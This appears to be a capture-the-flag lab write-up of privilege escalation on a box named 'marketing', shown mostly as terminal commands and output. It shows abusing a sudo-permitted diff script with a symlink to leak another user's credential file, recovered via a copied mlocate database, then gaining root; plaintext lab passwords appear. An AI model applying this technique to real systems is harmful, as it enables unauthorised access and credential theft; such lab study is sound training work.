Priv Esc
Last updated
Last updated
EzPwz2022_dev1$$23!!t.miller@marketing:/dev/shm$ sudo -l
[sudo] password for t.miller:
Matching Defaults entries for t.miller on marketing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User t.miller may run the following commands on marketing:
(m.sander) /usr/bin/sync.sh
t.miller@marketing:/dev/shm$ ls -la /usr/bin/sync.sh
-rwxr-xr-x 1 root root 386 Jul 13 2022 /usr/bin/sync.sht.miller@marketing:/dev/shm$ sudo -u m.sander /usr/bin/sync.sh -h
diff: missing operand after '/home/m.sander/personal/notes.txt'
diff: Try 'diff --help' for more information.
no updatet.miller@marketing:/dev/shm$ sudo -u m.sander /usr/bin/sync.sh
t.miller@marketing:/dev/shm$ sudo -u m.sander /usr/bin/sync.sh -h
t.miller@marketing:/dev/shm$ sudo -u m.sander /usr/bin/sync.sh linpeas.shCouldn't find any important files
t.miller@marketing:~$ id
uid=1000(t.miller) gid=1000(t.miller) groups=1000(t.miller),24(cdrom),46(plugdev),50(staff),100(users),119(mlocate)❯ scp t.miller@192.168.177.225:../../../../../../../var/lib/mlocate/mlocate.db .
t.miller@192.168.177.225's password:
mlocate.db 100% 4865KB 5.1MB/s 00:00creds-for-2022.txtt.miller@marketing:~$ sudo -u m.sander /usr/bin/sync.sh privme.txtFuck this box lol... gotta link our file to one only m.sander can read then get the script to show the differences
t.miller@marketing:~$ ln -sf /home/m.sander/personal/creds-for-2022.txt privme.txtm.sander:EzPwz2022_12345678#!m.sander@marketing:/home/t.miller$ sudo su
root@marketing:/home/t.miller# whoami && cat /root/proof.txt && ip addr
root
457711636cf1310f7630612724515b8b
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:d0:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.177.225/24 brd 192.168.177.255 scope global ens160
valid_lft forever preferred_lft forever
